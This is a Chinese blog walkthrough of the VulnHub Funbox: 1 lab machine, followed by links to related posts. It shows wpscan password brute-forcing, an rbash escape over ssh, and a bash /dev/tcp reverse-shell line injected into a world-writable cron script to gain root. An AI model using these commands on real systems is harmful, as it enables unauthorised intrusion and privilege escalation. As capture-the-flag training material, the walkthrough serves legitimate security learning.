vulnhub Funbox: 1

最新推荐文章于 2024-02-24 21:44:36 发布
最新推荐文章于 2024-02-24 21:44:36 发布
阅读量1.1k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: vulnhub 文章标签: linux 安全 rbash 定时任务 wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/elephantxiang/article/details/125698930
本文详细记录了一次渗透测试的过程,从使用Nmap扫描目标主机,发现开放端口,到利用Wpscan破解WordPress用户名和密码,然后通过SSH登录并绕过rbash限制。接着,通过修改文件权限和利用定时任务,最终实现权限提升,获取到root用户的反弹shell。整个过程展现了渗透测试中的技巧和策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

渗透思路:

nmap扫描----wpscan爆破网站用户名和密码----joe用户ssh登录并绕过rbash----文件权限777定时任务提权(多个用户定时任务执行同一个文件)

环境信息:

靶机:192.168.101.82

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.82

扫描到tcp端口21、22、80、33060

2、修改/etc/hosts

浏览器访问靶机80端口http://192.168.101.82,会自动跳转到http://funbox.fritz.box/,但由于没有在hosts文件中配置ip和域名的映射关系,因此无法正常访问网站。

修改攻击机的/etc/hosts文件

sudo vim /etc/hosts

加上

192.168.101.82 funbox.fritz.box

再在浏览器中访问http://funbox.fritz.box/,即可正常访问,并且可以看出站点是基于wordpress的(如果从外观不能确定的话,拉到最下面可以看到Proudly powered by WordPress。或者也可以用dirb或gobuster等扫描网站目录)

3、wpscan爆破网站用户名和密码

首先用wpscan枚举网站用户名

wpscan --url http://funbox.fritz.box/ -e

发现两个用户名:admin和joe

再用wpscan爆破网站用户的密码,其中user.txt中包含admin和joe两个用户名(各一行),密码字典用的是kali自带的rockyou.txt

wpscan --url http://funbox.fritz.box/ -U user.txt -P rockyou.txt

两个用户的密码都爆破出来了

| Username: joe, Password: 12345

| Username: admin, Password: iubire

4、joe用户ssh登录并绕过rbash

浏览器访问wordpress的登录页面:http://funbox.fritz.box/wp-login.php

本来打算能用admin登录就用,哪知道admin登录还开启了邮件验证

只能退而求其次改用joe登录,登录后来到http://funbox.fritz.box/wp-admin/

很可惜,没发现可以getshell的漏洞

尝试用步骤3中爆破出的用户名和密码进行ssh登录,admin无法登录,joe可以登录成功

ssh joe@192.168.101.82

密码12345

想执行find命令的时候发现这是个rbash

退出ssh登录,重新ssh登录,并在登陆时加上-t参数绕过rbash

ssh joe@192.168.101.82 -t "bash --noprofile"

这样登录后就可以绕过rbash限制

5、文件权限777定时任务提权

进入/home文件夹,发现除了joe的家目录,还有funny的家目录。

进入funny家目录,发现文件.reminder.sh,查看内容发现提示管理员会持续测试脚本.backup.sh,也就是说这可能是个定时任务,而这个.backup.sh又这么巧文件权限是777,也就是joe也有修改它的权限

在攻击机上nc监听8888端口,并将反弹shell语句写入.backup.sh

echo "bash -i &>/dev/tcp/192.168.101.34/8888 <&1" >> .backup.sh

稍等片刻,在攻击机上nc监听的端口上即可得到funny的反弹shell

输入如下命令得到交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

之后尝试寻找了很多提权方法都没找到,最后看了这篇writeup才发现原来root和funny都定时执行.backup.sh

VulnHub Funbox 1 Walkthrough - Rbash Escape

细想来,.reminder.sh中确实提示了admin会长期测试.backup.sh。

于是我同时在两个终端中用nc监听8888端口,并且一旦获得funny用户的反弹shell就终端连接并重新开始监听8888端口,最后终于在漫长的几分钟之后,得到了root的反弹shell

题外话(root和funny的定时任务)

root和funny的定时任务都在/var/spool/cron/crontabs文件夹下

/var/spool/cron/crontabs/funny内容如下,每2分钟执行一次/home/funny/.backup.sh

/var/spool/cron/crontabs/root内容如下,每5分钟执行一次/home/funny/.backup.sh

Vulnhub靶机Funbox1 writeup
xingjinhao123的博客
01-11 1603
下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 信息搜集 获取IP地址 扫描端口 这里看到一共开放了四个端口21:ftp,22:ssh,88:http,3306:mysql 21端口 登录ftp的时候需要用户名密码,先放着 80端口 访问80端口发现会跳转到funbox.fritz.box 修改hosts为: 再次访问80端口 这里看到使用了wordpress管理系统 可以使用wpscan尝试枚举下用户和插件: wpscan --url ht
vulnhub靶机实战--FunBox1
m0_64312309的博客
09-21 643
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub FUNBOX: 1记录
qq_45826388的博客
09-23 428
Description Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min. This VM is created/tested with Virtualbox. Maybe it works with vmware. If you need hints, ca
Funbox1:noname靶机渗透练习
Winsudo的博客
12-23 2916
funbox系列靶机练习
渗透工具——kali中wpscan简介
最新发布
2301_78006725的博客
02-24 1325
4、WordPress是全球流行的博客网站,许多外国的博客都是用它搭建的,但是存在着很多漏洞,专注于这些漏洞与其特性,一个专门针对该CMS的WPScan工具出现了。3、WordPress是全球流行的博客网站,全球有上百万人使用它来搭建博客。wpscan --url [url] -U [用户名字典路径] -P [密码字典路径]服务器评估工具,我们认为这个工具应该成为所有针对。漏洞的黑盒子扫描器,它可以为所有。二、wpscan工具的简单使用。网站进行的渗透测试的一部分。一、什么是wpscan。
Vulnhub靶机:FunBox 1
qq_48904485的博客
01-21 1263
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FunBox 110.0.2.26)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/
vulnhub Funbox: Next Level(funbox5)
箭雨镜屋
04-06 997
渗透思路:nmap扫描 ---- dirb扫描 ---- wpscan枚举用户名 ---- hydra爆破ssh登录密码 ---- 登录pop3端口查看邮件 ---- pkexec提权
vulnhub靶机:funbox 3
J_linnb的博客
02-22 706
【代码】vulnhub靶机:funbox 3。
Vulnhub靶机:FunBox 6
qq_48904485的博客
01-25 483
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FunBox 6(10.0.2.31)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-gamble-hall,551/
ssh: connect to host 192.168.101.34 port 22: Connection timed out
longcheng217的博客
04-01 1万+
背景: 使用 Cygwin64 登录虚拟机时发现无法远程登录虚拟机中Ubuntu系统(之前可以): $ ssh lc@192.168.101.34 ssh: connect to host 192.168.101.34 port 22: Connection timed out 解决步骤: 1. 查看是否开启了ssh服务 发现 ssh服务已经开启 2. 在PC端ping 虚拟机 C:\Use...
homebridge-fritz:Fritz!Box路由器和支持的DECT设备的Homebridge平台
05-13
霍布里奇·弗里茨 FRITZ!Box的Homebridge平台插件。 该插件公开: WLAN访客访问交换机 FRITZ!DECT插座(200、210) 电力线插座(510,540) FRITZ!DECT(300,301)和Comet!DECT温控器 FRITZ!DECT(400)按钮 FRITZ!DECT中继器作为温度传感器(100) 包括HAN FUN设备(例如德国电信)的窗户传感器 安装 按照homebridge上的homebridge安装说明进行。 全局安装此插件: npm install -g homebridge-fritz 将平台添加到config.json ,有关配置,请参见下文。 配置 { " platforms " : [ { " platform " : " FRITZ!Box " , " name " : " My
百度短地址 API接口 985.so 是一个免费且好用的短地址
热门推荐
qq_25600055的专栏
03-09 5万+
文档URL http://help.baidu.com/question?prod_en=webmaster&class=%CD%F8%D2%B3%CB%D1%CB%F7%CC%D8%C9%AB%B9%A6%C4%DC&id=1000913#05 5.怎样调用百度短网址API? 生成短网址 请求:向dwz.cn/create.php发送post请求,发送数据包括url=长网址 返
wpscan渗透wordpress靶机——dc6
网络设备配置-华为
09-22 1341
wordpress: wpscan: 实验环境:kali linux和靶机环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip 下载后,直接在vm打开即可。 注意要使kali和靶机同处一个网段之中,我这里都在VM中搭建NAT模式。 信息收集 靶机打后是这样的: 这个时候出于需求目的,我们需要探测目标主机的ip、操作系统和版本以及其他服务的版本号。kali中集成了很多信息收集的工具,我这里仅用最常使用的 NMAP。 一、勘测目标主机ip地址和开放端口及服
使用WPScan扫描wordpress获取用户密码
weixin_34126557的博客
01-25 1808
声明:此文档仅供安全学习和教学用途,禁止非法使用。wordpress的黑盒扫描器:wpscan实验效果:枚举用户列表、暴力破解用户密码、实验环境:靶机:Turnkey Linuxwordpress版)***机:kali linux 2.0实验步骤:搭建靶机换机:1、下载镜像,官网https://www.turnkeylinux.org/ 搜索wordpress下载只包含w...
小白日记1:kali环境Wpscan渗透Wordpress
ZiXuanFY的博客
09-05 1万+
一、什么是Wpscan?什么是Wordpres?     1.Wpscan      WPScan是一款针对wwordpress安全扫描软件;可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。     2.Wordpress      WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,用户可以在支持PHP和MySQL数据
密码爆破
温和的跳跃
01-09 266
生气想安装wpscan装了一下午了,还是kali好早知道留着了。我知道为啥要绕过验证码了。。。。。。 我今天知道了怎么解决爆破时候页面。我之前用Hydra 因为不管是正确的还是错误的都返回200,今天知道了可以指定的判断密码是否正确的条件,默认是黑名单模式。 https://blog.csdn.net/weixin_43039349/article/details/89323846 ...
vulnhub靶机EVM渗透笔记
liver100day的博客
08-02 1420
文章标题1.环境搭建2.信息收集2.1 主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:EVM IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/ 2.信息收集 2.1 主机发现 我们要进行渗透,首先得知道目标靶机的IP地址,否则将无从做起 arp-scan -l 3.漏洞利用 4.提权 5.总结 ...
wordpress漏洞扫描工具使用(wpscan实战)
天元喜羊羊的博客
08-07 1万+
http://www.2cto.com/Article/201212/178631.html BT5 WPSCAN 工具使用 首先看下Wpscan 工具目录 /pentest/web/wpscan 首先安装终端类型 apt-get install libcurl4-gnutls-dev gem install –user-install typhoeus gem insta
WPScan使用完整攻略:如何对WordPress站点进行安全测试
子曰小玖的博客
02-17 1022
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的...
FUNBOX: UNDER CONSTRUCTION!
08-16
- *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值